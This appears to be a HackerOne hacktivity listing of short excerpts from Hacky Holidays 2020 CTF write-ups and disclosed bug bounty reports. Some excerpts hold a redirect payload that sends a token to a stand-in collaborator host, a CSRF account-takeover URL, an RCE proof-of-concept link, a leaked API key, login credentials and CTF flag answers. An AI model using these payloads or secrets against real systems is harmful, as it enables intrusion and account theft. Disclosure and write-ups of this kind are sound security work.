h1-ctf: Grinchs website takendown with various other exploits
The HackyHolidays This is my first HackerOne CTF challenge writeup. Contents: flag1: Day 1 Check the files, robots.txt flag2: Day 2 one more : jquery.min.js flag3: Day 3 People Rater flag4: Day 4 Brute Force, Swag Shop flag5: Day 5 Brute Force, Secure Login flag6: Day 6 Brute Force, My Diary flag...
h1-ctf: [h1ctf-Grinch Networks] MrR3b00t Saving the Christmas
Disclaimer: Certain things are a bit modified to set the pieces for the story. Also you can find the flags for all 12 challenges in file F1138300 , Now enjoy : █▀▄▀█ █▀█ ░ █▀█ █▄▄ █▀█ █▀█ ▀█▀ █░▀░█ █▀▄ ▄ █▀▄ █▄█ █▄█ █▄█ ░█░ saves the Christmas Episode - 0x00 Pil0t.py It was a gloomy clear night,...
h1-ctf: HackyHolidays H1 CTF Writeup
HackyHolidays Day 1 Once the CTF started and the Grinch released the scope hackyholidays.h1ctf.com, I started the CTF by a good old Nmap scan, to see whats running on the server. So the nmap command looked like nmap -sC -sV -oA nmap hackyholidays.h1ctf.com/. The result showed a promising entry...
h1-ctf: Writeup Submission
The Write-Up will be published within the next hours, latest till Dec. 31st 12:00 PST under https://blogs.tippexs.io User: h4ck4r0ne Pass: s4nt4sucks Let me know if I need to submit anything else. I have started crafting a PDF but it became so huge that I have decided to create a complete new...
Brave Software: Phishing/Malware site blocking on Brave iOS can be bypassed with trailing dot in hostname
A vulnerability was discovered in Brave iOS nightly build that allowed bypassing of the phishing/malware site blocking feature by adding a trailing dot in the hostname. This allowed users to access prohibited sites without being blocked by Brave Shield protection...
Trellix: RXSS in https://jp.mcafee.com/apps/mdm/jp/3.0_asp/
A cross-site scripting XSS vulnerability was discovered in https://jp.mcafee.com/apps/mdm/jp/3.0asp/. The vulnerability was verified in Chrome 87 and Firefox. The vulnerability allowed execution of arbitrary JavaScript code by injecting it into the website's URL...
h1-ctf: HackyHolidays 2020 Full Write-up: Information Disclosure of 12 Flags
Intro This is my report for the 2020 Hacky Holidays HackerOne CTF. I managed to find all 12 flags with the assistance of my little helper, Jake. He specialises in brute-forcing via a unique keyboard mashing technique: F1134543 Anywho, let's get started... Flag 1: Robots The first one was a nice...
h1-ctf: 12 Days of CTF Walkthroughs
h1-ctf: 12 Days of Hacky Holidays This is my writeup for 12 Days of Hacky Holidays. The report is written such that beginners to CTFs will be able to learn the tricks of the trade. The Mission: The Grinch has gone hi-tech this year with the intention of ruining the holidays 😱 We need you to...
Glassdoor: Dom XSS Rootkit on [https://www.glassdoor.com/]
The reported page was vulnerable to DOM-based XSS via sc.keyword on https://www.glassdoor.com/Job/jobs.htm?sc.keyword=test and got resolved by another report 1064892. Thanks, @4peace for your submission...
LY Corporation: File sizes may be manipulated into negative numbers when uploading
The file sizes were manipulated into negative numbers when uploading. The message indicating insufficient storage space was displayed. However, the file size was recalculated and transmitted during the upload process, allowing the upload to proceed despite the negative file size...
Slack: Cross-site leak allows attacker to de-anonymize members of his team from another origin
This issue was reported by researcher @jub0bs via HackerOne on December 29, 2020. The Slack security team reviewed the issue, understanding the nature of information disclosure on Dec 30th. We closed the issue as informative, which we do to reflect that the report, while accurate, has not taken...
TikTok: Blocked user can see live video
A flaw had the potential to cause a user's live videos to be suggested to a blocked user. We thank @sandipgyawali for reporting this to our team and confirming the resolution...
h1-ctf: A Visit from The Grinch ~ 'Twas the night before Hackmas...
Foreword This was an amazing CTF! The first from Hackerone that I've finished and one that I have enjoyed the most. Huge shout out to @adamtlangley for creating this downright poetic challenge. My whopping 20+ invitations are already being put to good use. Hacky Holidays and Merry Hackmas! Flag 1...
Mail.ru: Gitlab search exposing personal data of employees on gitlab-edu.geekbrains.ru
An externally accessible Gitlab instance in Geekbrains was disclosing data of employees...
h1-ctf: Hacky Holidays Writeup
On December 12th, 2020, the CTF went live and the scope that we were allowed to attack was In Scope Domain - hackyholidays.h1ctf.com Our main motive was to infiltrate his network and take him down. The challenges appeared one by one till the 24th of December. Here we will be going through all the...
Nextcloud: Database error shown to the user when using a long guest name in richdocuments
When sharing a file to a guest and the file is allowed for editing, the user is asked to enter a guest name. If you enter a really long value for that name you get a database error that displays sensitive information: An exception occurred while executing 'INSERT INTO...
CS Money: Cookie poisoning leads to DOS and Privacy Violation
The summary submitted by gatolouco requires no additions by us and fully expresses the impact and reasons behind the vulnerability. Summary By changing the value of the cookie avatar, a hacker could not only get information on the support agent's IP address, but also disconnect all the supports without...
Automattic: Unauthenticated access to webmail at maildev.happytools.dev leading to compromised wordpress site api.happytools.dev [RCE]
Summary: Dear Team, Today when I was trying to find bugs on Happy Tools I found the 2 domains below for the staging environment - https://maildev.happytools.dev - https:// api.happytools.dev The SSL certificates of the two websites above were expired. But you can adjust your date-time to 02/02/2020 or before that ti...
Courier: Rate limit function bypass can lead to huge critical problems on the website.
Hello team, I have found a technique that can easily bypass the rate limit system of the website and with this bug an attacker can easily attack the login panel, send an unlimited number of huge notifications to a victim, bypass OTP codes and take over accounts etc. Basically I have added a header...
h1-ctf: Successfully took down the Grinch and saved the holidays from being ruined
Beginning ---------- HackerOne's official twitter account posted a tweet on 11th December announcing 12 days of hacky holidays where we have to take down the grinch and prevent him from ruining the Christmas holidays. F1132156 Challenge 1: Something to get started...
Shopify: Screenshot Service leaks X-ABS-App-Token
1. Login and create a development store 2. Start Burp Suite and open a Burp Collaborator client, then copy the collaborator payload 3. Edit the section header.liquid of your current theme. Adding this: window.location="https://pasteherecollaborator/"; Finally go to...
New Relic: Stored XSS via malicious key value of Synthetics monitor tag when visiting an Insights dashboard with filtering enabled
Introduction & Context This is a complex XSS that requires multiple steps in order to setup. It also requires you to have a good understanding of both New Relic Insights, New Relic Synthetics monitors, and the NerdGraph API explorer. Background Context: New Relic Synthetics and the history of tag...
U.S. Dept Of Defense: RCE in ██████ subdomain via CVE-2017-1000486
Summary: The application at ████████/ftn-Website/ uses primefaces 5.3 but not 5.3.8, making it vulnerable to unauthenticated RCE CVE-2017-1000486. Step-by-step Reproduction Instructions 1. Get the publicly available POC for this vulnerability here: https://github.com/pimps/CVE-2017-1000486 2...
U.S. Dept Of Defense: Sending trusted ████ and ██████████ emails through public API endpoint in ███████ site
Summary: A publicly accessible endpoint at PUT https://████████does not validate any of its four parameters: to, from, subject, text. This enables sending email to any address, with any content, with any from address, on a server that is in ██████whitelist. Such services include, but are not...
h1-ctf: Mission completed. Grinch Networks is down and Christmas saved.
Hi, I decided to create a good writeup, but for that I'd need some time, that's why I am submitting this pre-report now, and the actual report I'll submit before the deadline in this thread, right under this one. Here is some proof that Grinch Networks is down:...
h1-ctf: [h1-ctf] 12 Days of Adventure to stop Grinch from ruining Christmas
Day 1: https://hackyholidays.h1ctf.com/robots.txt User-agent: Disallow: /s3cr3t-ar3a Flag: flag48104912-28b0-494a-9995-a203d1e261e7 Here we go with t...
h1-ctf: Taking Grinch Down To Save Holidays
Hi thank you Hackerone and Adam for organizing the CTF, this had honestly helped me to learn good skills and techniques. The CTF began with the scope: hackyholidays.h1ctf.com and mission to take down grinch So here's a quick visual summary of all the challenges F1131175 F1131176 1. Grinch Robots ...
U.S. Dept Of Defense: Sensitive data exposure via https://███████/secure/QueryComponent!Default.jspa - CVE-2020-14179
Summary: Information Disclosure vulnerability in outdated Jira. Description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the...
h1-ctf: [ Hacky Holidays CTF ] Completely taken down the Grinch Networks
Day 1 - Robot flag We're presented with a sample UI page without any function. So I guessed content discovery is the best way to find the flag. And robots.txt came to my mind and I found the flag. https://hackyholidays.h1ctf.com/robots.txt Response User-agent: Disallow: /s3cr3t-ar3a Flag:...
h1-ctf: 12 Days of Hacky Holidays write-up, but as a text-based RPG?
The flags are - flag48104912-28b0-494a-9995-a203d1e261e7 - flagb7ebcb75-9100-4f91-8454-cfb9574459f7 - flagb705fb11-fb55-442f-847f-0931be82ed9a - flag972e7072-b1b6-4bf7-b825-a912d3fd38d6 - flag2e6f9bf8-fdbd-483b-8c18-bdf371b2b004 - flag18b130a7-3a79-4c70-b73b-7f23fa95d395 -...
h1-ctf: Hacky Holidays CTF Writeup
Greetings team Yay! Finally I made it to the end, thank you very much for launching this fantastic event, I had to review topics that I thought I knew, learned a lot and I am sure that I will continue learning with the community : F1130889 Hacky Holidays! P.S. I will put my writeup in my next...
WHO COVID-19 Mobile App: Internal API endpoint is accessible for everyone
Summary: It looks like the endpoint /internal/cron/refreshCaseStats as configured in cron.yaml https://github.com/WorldHealthOrganization/app/blob/master/server/appengine/src/main/webapp/WEB-INF/cron.yamlL3 is accessible for everyone. Since it is configured as a cronjob to run every 5 minutes and...
TikTok: HTML Injection through Account Name field on TikTok ads portal being rendered on emails
The Account Name field on the TikTok Ads Portal did not have restrictions on HTML tag injections which an attacker could have potentially used for phishing attacks. We thank @nagli for reporting this to our team and confirming the resolution...
h1-ctf: Grinch Networks compromised!
Grinch Networks compromised! For fast triage/validation and inspired by @manoelt in other CTF, I made a bash script to find and print all the 12 flags of this CTF. The script uses curl, wget, google-chrome headless for flag 2, unzip, grep and sed. If any of these commands is missing, the script...
Mail.ru: XSS (reflected, and then, cookie persisted) on api documentation site theme selector (old version of dokuwiki)
Reflected XSS on apidocs.ucs.ru via GET parameter bootswatch-theme...
Clario: Google API key leaks and security misconfiguration leads Open Redirect Vulnerability
Summary: Hello, when I searched your targets and JavaScript files I found a Google API key leak in the URL https://account.clario.co/js/main.044af6485f6b0cd90809.js. Part of the leak is down below: 'https://firebasedynamiclinks.googleapis.com/v1/shortLinks?key=AIzaSyAw-SpLHVTIP3IFEIkckCuEmIhnUrY9OrQ';...
h1-ctf: CTF Writeup
Hi, First of all, thanks for this amazing CTF! I will post my writeup soon, it is time to sleep now : F1129602 By the way, the creator of challenge 11 is crazy. Impact Grinch Network is finally down...
h1-ctf: [hacky-holidays] Grinch network is down
Flag 1 As always CTF begins with a tweet: F1126838 So we are supposed to start from https://hackyholidays.h1ctf.com/ . The first flag was easy on https://hackyholidays.h1ctf.com/ I found a file named robots.txt which had the following content: User-agent: Disallow: /s3cr3t-ar3a Flag:...
Stripe: GraphQL cross-tenant IDOR giving write access through the operation UpdateAtlasApplicationPerson
@bubbounty discovered an Insecure Direct Object Reference IDOR vulnerability that allowed someone with prior Admin access to a Stripe account to add a co-founder to a Stripe Atlas application belonging to the merchant account they used to administer. The issue has been addressed by only allowing...
QIWI: Account takeover just through csrf in https://booking.qiwi.kz/profile
Hello Team: after registering with any account, we found that we can change the email in the profile to another one by just using a GET request https://booking.qiwi.kz/ajaxconfirmcontact?type=emailconfirmed&[email protected]&iframePopupMode=1 but without verification, an attacker can steal accounts...
h1-ctf: Wholesome Hacky Holidays: A Writeup
Flag 1 Warm-up: flag48104912-28b0-494a-9995-a203d1e261e7 Checking the robots.txt the flag can be found. Also a path is revealed: /s3cr3t-ar3a Flag 2 It's right in front of you: flagb7ebcb75-9100-4f91-8454-cfb9574459f7 With the previously found path /s3cr3t-ar3a, the flag was hidden in plain sight...
U.S. Dept Of Defense: ███████mill is vulnerable to cross site request forgery that leads to full account take over.
Summary: The form within the "My Account" page in ███████mil fails to verify the CSRF token used when a user makes changes such as changing the password and other details. For example, an attacker can change the user's email address, full name, phone number, etc. In this way the attacker can gai...
h1-ctf: Hacky Holidays CTF Writeup
Intro: 12 days of challenges - some more challenging than others! This holiday CTF had all 12 challenges hosted on the website https://hackyholidays.h1ctf.com/ F1129112 Challenge 1: I started by significantly overthinking all of the early challenges in this competition. When this CTF started the...
Stripo Inc: Stored XSS in the banner block description
Steps To Reproduce: - Create a new template and add a banner block F1128944 - Add a description to the banner block description: " - Malicious code executed F1128945 Proof Of Concept: F1128942 Impact With this vulnerability, an attacker can for example steal users cookies or redirect users on...
h1-ctf: Complete destruction of the Grinch server
Hackyholidays flag 1 First flag is just a matter of reading /robots.txt file: User-agent: Disallow: /s3cr3t-ar3a Flag: flag48104912-28b0-494a-9995-a203d1e261e7 flag 2 Visiting /s3cr3t-ar3a and opening it with developer tools gets the second flag: flagb7ebcb75-9100-4f91-8454-cfb9574459f7 It is...
WHO COVID-19 Mobile App: Error Page Text Injection (no compromise)
Hi team! I want to report a context spoofing or text injection at http://hack.whocoronavirus.org/ 404 page Vulnerability Description : The http://hack.whocoronavirus.org/ scope allows users to inject any content on the 404 not found webpage Vulnerable Location :...
h1-ctf: Invading Grinch Network and Saving Christmas
How we saved Christmas As usual with H1 CTF challenges we are provided with a target URL. In our case it is the following: https://hackyholidays.h1ctf.com/ We started by visiting the URL and seeing what is going on. All we could see is a page with an image with a warning message. F1125722 We quickly...
Mail.ru: DOM based XSS via postMessage at store.my.games
mailru.core.js as used by GMR/store.my.games application was vulnerable to XSS via PostMessage handler...
h1-ctf: Writeup Hackyholiday CTF
Hi there, Find my writeup on attached : F1128138 Thanks adam for making the CTF, Really PAIN for my head! Impact Hackerone Hoodie ? 😍😍...
h1-ctf: Hackyholidays CTF writeup
Writeup for the hackyholidays CTF This CTF consisted of 12 challenges released daily in the 12 days leading up to Christmas. The goal was to stop the Grinch from ruining Christmas by slowly destroying the apps that he used to terrorize Santa and his elves. The challenges were: 1. Robots.txt 2. DOM...